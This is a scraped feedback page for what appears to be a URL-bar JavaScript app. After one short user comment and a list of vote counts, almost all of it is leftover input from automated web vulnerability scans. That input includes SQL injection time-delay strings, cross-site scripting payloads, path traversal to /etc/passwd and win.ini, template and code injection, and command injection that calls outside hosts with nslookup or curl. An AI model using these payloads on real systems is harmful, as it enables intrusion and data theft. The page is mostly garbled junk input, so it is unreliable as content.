Feedback
Submit suggestionAwesome by Anonymous - 147 months ago
This is a great URL bar javascript hack, I hope the designers make more apps like this.
I am definitely liking you guys on Facebook.
This is a great URL bar javascript hack, I hope the designers make more apps like this.
I am definitely liking you guys on Facebook.
602 agree
Vote8064 agree
2857 agree
798 agree
772 agree
746 agree
746 agree
710 agree
681 agree
661 agree
660 agree
644 agree
632 agree
623 agree
622 agree
602 agree
592 agree
590 agree
579 agree
578 agree
572 agree
566 agree
565 agree
564 agree
564 agree
558 agree
552 agree
522 agree
522 agree
519 agree
511 agree
506 agree
497 agree
495 agree
493 agree
489 agree
488 agree
482 agree
478 agree
476 agree
469 agree
467 agree
465 agree
461 agree
460 agree
455 agree
455 agree
441 agree
433 agree
432 agree
420 agree
HARIDAS LAXMAN BHOSALE
Tcwitek_123
17290283Anonymous
123451235lxbfYeaa
1JJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>WfxYANoW
${9999877+10000241}${10000326+9999826}
1WfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpgWfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpgWfxYANoW
1BFG0YrCorO1VDyQ2GNSO
1WfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
file:///etc/passwdWfxYANoW
response.write(9560061*9535608)Anonymous
1WfxYANoW
http://bxss.me/t/fit.txt?.jpgWfxYANoW
'+response.write(9560061*9535608)+'WfxYANoW
1WfxYANoW
"+response.write(9560061*9535608)+"WfxYANoW
/etc/shellsresponse.write(9005895*9304670)
1WfxYANoW
../1'+response.write(9005895*9304670)+'
1WfxYANoW
echo fsomtd$()\ liuhgs\nz^xyu||a #' &echo fsomtd$()\ liuhgs\nz^xyu||a #|" &echo fsomtd$()\ liuhgs\nz^xyu||a #WfxYANoW
../../../../../../../../../../../../../../etc/shells"+response.write(9005895*9304670)+"
1WfxYANoW
L6oGOXGHWfxYANoW
&echo yzjyrp$()\ ckexnw\nz^xyu||a #' &echo yzjyrp$()\ ckexnw\nz^xyu||a #|" &echo yzjyrp$()\ ckexnw\nz^xyu||a #WfxYANoW
c:/windows/win.iniWfxYANoW
ijbIjaN7: JqJWWHFpWfxYANoW
1&n953933=v927566n8DMLrvx
1WfxYANoW
bxss.meTAydghZB: HKIPa4JC
1file:///etc/passwd
1SlNpN1A0bVE=
1WfxYANoW&n954236=v998357
1WfxYANoW
11yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
1WfxYANoW
1&echo uxmdcl$()\ ssedbm\nz^xyu||a #' &echo uxmdcl$()\ ssedbm\nz^xyu||a #|" &echo uxmdcl$()\ ssedbm\nz^xyu||a #WfxYANoW
)../WfxYANoW
1WfxYANoW
!(()&&!|*|*|Http://bxss.me/t/fit.txt
1WfxYANoW
^(#$!@#$)(()))******http://bxss.me/t/fit.txt?.jpg
1WfxYANoW
|echo tibmov$()\ sfekkp\nz^xyu||a #' |echo tibmov$()\ sfekkp\nz^xyu||a #|" |echo tibmov$()\ sfekkp\nz^xyu||a #)
1WfxYANoW
1WfxYANoW
'.gethostbyname(lc('hitee'.'taanqlms2de0d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(65).chr(106).chr(77).'WfxYANoW
1|echo kzsvng$()\ voxwfz\nz^xyu||a #' |echo kzsvng$()\ voxwfz\nz^xyu||a #|" |echo kzsvng$()\ voxwfz\nz^xyu||a #/etc/shells
1WfxYANoW
(nslookup -q=cname hittwwhbrvbti3b844.bxss.me||curl hittwwhbrvbti3b844.bxss.me))!(()&&!|*|*|
1WfxYANoW
$(nslookup -q=cname hitioishmczyf3616a.bxss.me||curl hitioishmczyf3616a.bxss.me)c:/windows/win.ini
1WfxYANoW
&nslookup -q=cname hittcsmkoaevuc2383.bxss.me&'\"`0&nslookup -q=cname hittcsmkoaevuc2383.bxss.me&`'WfxYANoW
'"()WfxYANoW
&(nslookup -q=cname hitkkazkibgkl953ba.bxss.me||curl hitkkazkibgkl953ba.bxss.me)&'\"`0&(nslookup -q=cname hitkkazkibgkl953ba.bxss.me||curl hitkkazkibgkl953ba.bxss.me)&`'WfxYANoW
".gethostbyname(lc("hitde"."qursexktb87fc.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(89).chr(105).chr(73)."WfxYANoW
1'&&sleep(27*1000)*ozbtbi&&'bxss.me
1WfxYANoW
gethostbyname(lc('hitvp'.'alcmuatob895a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(82).chr(97).chr(80)WfxYANoW
|(nslookup -q=cname hitaxlixytqkuce909.bxss.me||curl hitaxlixytqkuce909.bxss.me)WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
`(nslookup -q=cname hitlygrfstsfm2a905.bxss.me||curl hitlygrfstsfm2a905.bxss.me)`WfxYANoW
';print(md5(31337));$a='^(#$!@#$)(()))******
1WfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))WfxYANoW
";print(md5(31337));$a="WfxYANoW
1"&&sleep(27*1000)*ejwfje&&"WfxYANoW
xfs.bxss.meWfxYANoW
'"xfs.bxss.me
1WfxYANoW
1'||sleep(27*1000)*gmazrk||'WfxYANoW
${@print(md5(31337))}WfxYANoW
1"||sleep(27*1000)*wcktfy||"WfxYANoW
<!--WfxYANoW
1'"()&%<zzz><ScRiPt >nyOu(9311)</ScRiPt>WfxYANoW
;(nslookup -q=cname hithxdhdapbkr29275.bxss.me||curl hithxdhdapbkr29275.bxss.me)|(nslookup -q=cname hithxdhdapbkr29275.bxss.me||curl hithxdhdapbkr29275.bxss.me)&(nslookup -q=cname hithxdhdapbkr29275.bxss.me||curl hithxdhdapbkr29275.bxss.me)WfxYANoW
${@print(md5(31337))}\'"
1WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hityrhopnfgvaa3d93.bxss.me||curl${IFS}hityrhopnfgvaa3d93.bxss.me)WfxYANoW
'.print(md5(31337)).'WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hitlcqaxdueeu0d7c6.bxss.me||curl${IFS}hitlcqaxdueeu0d7c6.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitlcqaxdueeu0d7c6.bxss.me||curl${IFS}hitlcqaxdueeu0d7c6.bxss.me)&`'WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW
1WfxYANoW
'"()&%<zzz><ScRiPt >nyOu(9574)</ScRiPt><!--
1WfxYANoW
bxss.me/t/xss.html?%00HttP://bxss.me/t/xss.html?%00
1WfxYANoW
1WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(100).concat(88).concat(117).concat(89)+(require"socket" Socket.gethostbyname("hitrf"+"upjudxvkd6c6f.bxss.me.")[3].to_s)+"';print(md5(31337));$a='
1WfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(109).concat(65).concat(104).concat(83)+(require'socket' Socket.gethostbyname('hitua'+'qldcdblq216df.bxss.me.')[3].to_s)+'bxss.me/t/xss.html?%00
1'"()
1";print(md5(31337));$a="
1WfxYANoW'&&sleep(27*1000)*wbclig&&'
1WfxYANoW
commentWfxYANoW"&&sleep(27*1000)*rdvkav&&"
1WfxYANoW
'A'.concat(70-3).concat(22*4).concat(109).concat(81).concat(120).concat(81)+(require'socket' Socket.gethostbyname('hitcw'+'lyzhfhfx35f32.bxss.me.')[3].to_s)WfxYANoW
comment�WfxYANoW'||sleep(27*1000)*fqzhkk||'
1WfxYANoW
19880804WfxYANoW
comment/.${@print(md5(31337))}
1comment
1${@print(md5(31337))}\
1comment�
1'.print(md5(31337)).'
1WfxYANoW"||sleep(27*1000)*wlcfdl||"
1comment/.
1WfxYANoW
bfg3982<s1﹥s2ʺs3ʹhjl3982WfxYANoW
<%={{={@{#{${dfb}}%>WfxYANoW
<th:t="${dfb}#foreachWfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
1WfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >nyOu(9506)</ScRiPt>WfxYANoW
1<WQEOGV>I0FPI[!+!]</WQEOGV>WfxYANoW
1<script>nyOu(9246)</script>WfxYANoW
1<script>nyOu(9777)</script>9777WfxYANoW
1<ScR<ScRiPt>IpT>nyOu(9674)</sCr<ScRiPt>IpT>WfxYANoW
1<ScRiPt >nyOu(9786)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9783></ScRiPt>WfxYANoW
1<�ScRiPt >nyOu(9995)</ScRiPt>WfxYANoW
1Zq1FB7JLWfxYANoW
1<isindex type=image src=1 onerror=nyOu(9028)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9117'>WfxYANoW
1<body onload=nyOu(9842)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=nyOu(9389)>WfxYANoW
1<img src=xyz OnErRor=nyOu(9011)>WfxYANoW
1<img/src=">" onerror=alert(9931)>WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%6E%79%4F%75%289685%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1\u003CScRiPt\nyOu(9334)\u003C/sCripT\u003EWfxYANoW
1WfxYANoW
-1 OR 2+139-139-1=0+0+0+1 --WfxYANoW
1<ScRiPt>nyOu(9344)</sCripT>WfxYANoW
-1 OR 2+15-15-1=0+0+0+1WfxYANoW
-1' OR 2+186-186-1=0+0+0+1 --WfxYANoW
1<input autofocus onfocus=nyOu(9039)>WfxYANoW
-1' OR 2+518-518-1=0+0+0+1 or 'HDrspCEI'='WfxYANoW
-1" OR 2+111-111-1=0+0+0+1 --WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
1}body{zzz:Expre/**/SSion(nyOu(9356))}WfxYANoW
1i5tzl <ScRiPt >nyOu(9006)</ScRiPt>WfxYANoW
1<WFSJAH>4N2YG[!+!]</WFSJAH>WfxYANoW
1<ifRAme sRc=9977.com></IfRamE>WfxYANoW
1<a8uOZn9 x=9992>WfxYANoW
1<img sRc='http://attacker-9209/log.php?WfxYANoW
1<aLCuWSD<WfxYANoW'"()&%<zzz><ScRiPt >nyOu(9520)</ScRiPt>
1'"()&%<zzz><ScRiPt >nyOu(9023)</ScRiPt>
1WfxYANoW9601102
1bfg8291<s1﹥s2ʺs3ʹhjl8291
1WfxYANoW
1*if(now()=sysdate(),sleep(15),0)<%={{={@{#{${dfb}}%>
1<th:t="${dfb}#foreach
11}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1dfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1dfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >nyOu(9239)</ScRiPt>
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZWfxYANoW<W36UC5>OMVDU[!+!]</W36UC5>
1WfxYANoW<script>nyOu(9618)</script>
1WfxYANoW<script>nyOu(9099)</script>9099
1WfxYANoW<ScRiPt >nyOu(9905)</ScRiPt>
1WfxYANoW<�ScRiPt >nyOu(9071)</ScRiPt>
1WfxYANoW<body onload=nyOu(9345)>
1WfxYANoW<img src=xyz OnErRor=nyOu(9783)>
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZWfxYANoW<img/src=">" onerror=alert(9581)>
1WfxYANoW\u003CScRiPt\nyOu(9718)\u003C/sCripT\u003E
1WfxYANoW<ScRiPt>nyOu(9616)</sCripT>
1WfxYANoW<input autofocus onfocus=nyOu(9827)>
1<a HrEF=http://xss.bxss.me></a>
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(nyOu(9085))}
1WfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoWMOM7s <ScRiPt >nyOu(9155)</ScRiPt>
1WfxYANoW<WE2EHD>O5SJP[!+!]</WE2EHD>
1WfxYANoW<ifRAme sRc=9120.com></IfRamE>
1WfxYANoW<aKfKYU0 x=9787>
1WfxYANoW<img sRc='http://attacker-9078/log.php?
1WfxYANoW<aNV9M9T<
1WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1wY0SQwvV'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 345=(SELECT 345 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 855=(SELECT 855 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 906=(SELECT 906 FROM PG_SLEEP(15))--WfxYANoW
1M1Kf1A09' OR 778=(SELECT 778 FROM PG_SLEEP(15))--WfxYANoW
1k3ysrgnO') OR 73=(SELECT 73 FROM PG_SLEEP(15))--WfxYANoW
15tLIGrry')) OR 694=(SELECT 694 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@ErDH4WfxYANoW
1WfxYANoW
1WfxYANoW8EcxF9Xe
1WfxYANoW
1-1 OR 2+606-606-1=0+0+0+1 --
1-1 OR 2+904-904-1=0+0+0+1
1-1' OR 2+857-857-1=0+0+0+1 --
1-1' OR 2+953-953-1=0+0+0+1 or 'tjk584LN'='
1-1" OR 2+284-284-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoW5Dx74ax8'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@4IaX4
1Peter Winter
555-555-0199@example.comPecedec150
555-555-0199@example.com@@hVbR8
1@@IQnU2
1svhnofck
1qeredkue
response.write(9396415*9307860)qeredkue
'+response.write(9396415*9307860)+'tmcxgkui
1vlxberft
set|set&setqeredkue
"+response.write(9396415*9307860)+"tmcxgkui
1vlxberft
$(nslookup pQdPJflx)response.write(9434147*9599235)
1tmcxgkui
gsMhF4XZvlxberft
&nslookup 2q987YtS&'\"`0&nslookup 2q987YtS&`''+response.write(9434147*9599235)+'
1jdtmpfgk
wZW7Vfq8tmcxgkui
-1 OR 2+652-652-1=0+0+0+1 --ovrqghks
../../../../../../../../../../etc/passwdset|set&set
1"+response.write(9434147*9599235)+"
1kxFCvo5R
1tmcxgkui
-1 OR 2+42-42-1=0+0+0+1ovrqghks
../../../../../../../../../../../../../../../proc/version$(nslookup aB0LFaQB)
1jndesdqo
${10000456+10000449}pvrnlura
1tmavivpy
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpgtmcxgkui
-1' OR 2+658-658-1=0+0+0+1 --ovrqghks
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg&nslookup dYq3XjHC&'\"`0&nslookup dYq3XjHC&`'
1${9999617+9999929}
1tmavivpy
1some_inexistent_file_with_long_name�.jpgtmcxgkui
-1' OR 2+924-924-1=0+0+0+1 or 'MOPPQijq'='ovrqghks
../../../../../../../../../../etc/passwd�.jpgbFg2Nm1GcVA=
1kkxinhaw
1&n900442=v911665rkiunrcx
)tmavivpy
Http://testasp.vulnweb.com/t/fit.txttmcxgkui
-1" OR 2+570-570-1=0+0+0+1 --ovrqghks
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgrkiunrcx
!(()&&!|*|*|tmavivpy
http://testasp.vulnweb.com/t/fit.txt?.jpgtmcxgkui
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/ovrqghks
/../..//../..//../..//../..//../..//etc/passwd�.jpgvvwchpac
'"()jrhltqfv&n979855=v906520
1pvrnlura
1rkiunrcx
^(#$!@#$)(()))******tmavivpy
testasp.vulnweb.comtmcxgkui
if(now()=sysdate(),sleep(15),0)/*'XOR(if(now()=sysdate(),sleep(15),0))OR'"XOR(if(now()=sysdate(),sleep(15),0))OR"*/ovrqghks
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdAnonymous
1)
1tmcxgkui
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/ovrqghks
/etc/passwd'"()
1lednnuoa
;print(md5(acunetix_wvs_security_test));!(()&&!|*|*|
11some_inexistent_file_with_long_name�.jpg
1tmcxgkui
-1; waitfor delay '0:0:10' --ovrqghks
%2fetc%2fpasswdttqssrvr
http://testasp.vulnweb.com/t/xss.html?%00.jpglednnuoa
';print(md5(acunetix_wvs_security_test));$a='^(#$!@#$)(()))******
1Http://testasp.vulnweb.com/t/fit.txt
1tmcxgkui
-1); waitfor delay '0:0:10' --ovrqghks
/.././.././.././.././.././.././.././../etc/./passwd%00http://testasp.vulnweb.com/t/xss.html?%00.jpg
1lednnuoa
";print(md5(acunetix_wvs_security_test));$a="fxtoulpk
1xafbylwh
http://hitxWVfZpwAUs.bxss.me/http://testasp.vulnweb.com/t/fit.txt?.jpg
1tmcxgkui
1 waitfor delay '0:0:10' --ovrqghks
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdpswbkcju
1lednnuoa
${@print(md5(acunetix_wvs_security_test))}fxtoulpk
commenttestasp.vulnweb.com
1http://hitD51rjKuVtC.bxss.me/
1tmcxgkui
8qQt5ufE'; waitfor delay '0:0:10' --ovrqghks
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwdpswbkcju
1'"lednnuoa
${@print(md5(acunetix_wvs_security_test))}\fxtoulpk
comment�blcfwnwt
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))qrfjvmvb
/www.vulnweb.comtmcxgkui
-1;select pg_sleep(10); --pswbkcju
\;print(md5(acunetix_wvs_security_test));
1fxtoulpk
comment/./www.vulnweb.com
1tmcxgkui
-1);select pg_sleep(15); --ovrqghks
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.';print(md5(acunetix_wvs_security_test));$a='
1fxtoulpk
1laosgirl
'"tpokuhxp
1'"()&%<acx><ScRiPt >u8YR(9594)</ScRiPt>tmcxgkui
-1));select pg_sleep(15); --pswbkcju
@@I19jQovrqghks
file:///etc/passwd";print(md5(acunetix_wvs_security_test));$a="
1comment
1laosgirl
<!--tmcxgkui
nLThcsOK';select pg_sleep(15); --pswbkcju
JyI=ovrqghks
/\../\../\../\../\../\../\../etc/passwd${@print(md5(acunetix_wvs_security_test))}
1comment�
1'"
1tpokuhxp
'"()&%<acx><ScRiPt >u8YR(9705)</ScRiPt>tmcxgkui
6cbesG5b');select pg_sleep(15); --ovrqghks
WEB-INF/web.xml${@print(md5(acunetix_wvs_security_test))}\
1comment/.
1<!--
1tmcxgkui
yVjPVWdm'));select pg_sleep(15); --ovrqghks
/WEB-INF/web.xmltpokuhxp
1_9438tmcxgkui
1pswbkcju
(select convert(int,CHAR(65)))ovrqghks
WEB-INF\web.xmltmcxgkui
1pswbkcju
1../../../../../../../../../../etc/passwd
1tpokuhxp
acu1690<s1﹥s2ʺs3ʹuca1690rqhJayfI
11'"
1-1 OR 2+307-307-1=0+0+0+1 --
1\
1-1 OR 2+207-207-1=0+0+0+1
1../../../../../../../../../../etc/passwd�.jpg
1-1' OR 2+171-171-1=0+0+0+1 --
1@@AZWe5
1tpokuhxp
{{9999503*9999051}}-1' OR 2+997-997-1=0+0+0+1 or 'HDwviTy8'='
1JyI=
1-1" OR 2+508-508-1=0+0+0+1 --
1.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1/etc/passwd
1tpokuhxp
1<ScRiPt >u8YR(9910)</ScRiPt>(select convert(int,CHAR(65)))
1%2fetc%2fpasswd
1tpokuhxp
1<WAEPKN>TFKLP[!+!]</WAEPKN>1 waitfor delay '0:0:7' --
1firXAADG'; waitfor delay '0:0:15' --
1tpokuhxp
1<script>u8YR(9630)</script>xq0hBzPZ';select pg_sleep(15); --
1nYFgZ09J');select pg_sleep(15); --
1tpokuhxp
1<ScR<ScRiPt>IpT>u8YR(9878)</sCr<ScRiPt>IpT>oSK7KeFa'));select pg_sleep(22); --
1file:///etc/passwd
1/\../\../\../\../\../\../\../etc/passwd
1tpokuhxp
1<ScRiPt >u8YR(9377)</ScRiPt>WEB-INF/web.xml
1/WEB-INF/web.xml
1tpokuhxp
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9615></ScRiPt>WEB-INF\web.xml
1tpokuhxp
1<�ScRiPt >u8YR(9915)</ScRiPt>tpokuhxp
1<video><source onerror="javascript:u8YR(9776)">tpokuhxp
1<isindex type=image src=1 onerror=u8YR(9239)>tpokuhxp
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9679'>tpokuhxp
1<body onload=u8YR(9551)>tpokuhxp
1<img src=//testasp.vulnweb.com/t/dot.gif onload=u8YR(9644)>tpokuhxp
1<img src=xyz OnErRor=u8YR(9462)>tpokuhxp
1<img/src=">" onerror=alert(9337)>tpokuhxp
%31%3C%53%63%52%69%50%74%20%3E%75%38%59%52%289341%29%3C%2F%73%43%72%69%70%54%3Etpokuhxp
1\u003CScRiPt\u8YR(9922)\u003C/sCripT\u003Etpokuhxp
1<ScRiPt>u8YR(9262)</sCripT>tpokuhxp
1<input autofocus onfocus=u8YR(9739)>tpokuhxp
<a HrEF=http://www.vulnweb.com></a>tpokuhxp
<a HrEF=jaVaScRiPT:>tpokuhxp
[url=http://www.vulnweb.com][/url]tpokuhxp
1<img<!-- --> src=x onerror=alert(9637);//><!-- -->tpokuhxp
1}body{acu:Expre/**/SSion(u8YR(9067))}tpokuhxp
1<% contenteditable onresize=u8YR(9179)>tpokuhxp
1_RkRNy <ScRiPt >u8YR(9606)</ScRiPt>tpokuhxp
1<WMDFNO>WMW9D[!+!]</WMDFNO>tpokuhxp
1<ifRAme sRc=9235.com></IfRamE>tpokuhxp
1<GTPMAT x=9527>tpokuhxp
1<img sRc='http://attacker-9129/log.php?tpokuhxp'"()&%<acx><ScRiPt >u8YR(9199)</ScRiPt>
1'"()&%<acx><ScRiPt >u8YR(9469)</ScRiPt>
1tpokuhxp_9347
1acu1097<s1﹥s2ʺs3ʹuca1097
1{{10000043*9999976}}
1tpokuhxp<ScRiPt >u8YR(9059)</ScRiPt>
1tpokuhxp<WCWXQD>RBNIB[!+!]</WCWXQD>
1tpokuhxp<script>u8YR(9479)</script>
1tpokuhxp<ScRiPt >u8YR(9689)</ScRiPt>
1tpokuhxp<�ScRiPt >u8YR(9763)</ScRiPt>
1tpokuhxp<body onload=u8YR(9605)>
1tpokuhxp<img src=xyz OnErRor=u8YR(9579)>
1tpokuhxp<img/src=">" onerror=alert(9876)>
1tpokuhxp\u003CScRiPt\u8YR(9861)\u003C/sCripT\u003E
1tpokuhxp<ScRiPt>u8YR(9548)</sCripT>
1tpokuhxp<input autofocus onfocus=u8YR(9453)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1tpokuhxp}body{acu:Expre/**/SSion(u8YR(9818))}
1tpokuhxp<% contenteditable onresize=u8YR(9252)>
1tpokuhxp_If3Ne <ScRiPt >u8YR(9140)</ScRiPt>
1tpokuhxp<WFAJKD>BTLKD[!+!]</WFAJKD>
1tpokuhxp<ifRAme sRc=9762.com></IfRamE>
1tpokuhxp<D78FTL x=9365>
1tpokuhxp<img sRc='http://attacker-9080/log.php?
1Comment